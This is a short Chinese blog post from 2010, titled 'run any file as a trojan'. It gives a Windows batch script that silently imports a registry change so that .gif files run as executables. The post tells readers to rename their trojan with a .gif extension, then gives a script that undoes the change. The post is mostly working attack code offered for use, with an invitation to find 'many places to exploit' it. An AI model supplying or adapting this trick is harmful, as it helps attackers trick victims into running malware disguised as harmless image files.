任意文件当做木马来运行
发布:admin | 发布时间: 2010年4月12日任意文件当做木马来运行
更改exe为gif:
@echo off
color 1A
ECHO Windows Registry Editor Version 5.00>gif.reg
ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.gif]>>gif.reg
ECHO "Content Type"="application/x-msdownload">>gif.reg
ECHO @="exefile">>gif.reg
regedit /s gif.reg>nul 2>nul
del /s gif.reg>nul 2>nul
这个代码保存成.BAT的文件。
先运行这个BAT文件,系统会把.GIF文件来当做应用程序来运行
当然我们的木马后缀要换成.GIF 的。
恢复gif默认:
@echo off
color 1A
ECHO Windows Registry Editor Version 5.00>gif.reg
ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.gif]>>gif.reg
ECHO "Content Type"="image/gif">>gif.reg
ECHO @="giffile">>gif.reg
regedit /s gif.reg>nul 2>nul
del /s gif.reg>nul 2>nul
这个代码保存成.BAT的文件。
大家可以发挥想象,有很多可以利用的地方。
文章如转载,请注明转载自:http://www.5iadmin.com/post/518.html
- 相关文章:
木马清除记 (2010-2-2 11:18:34)
发表评论
◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。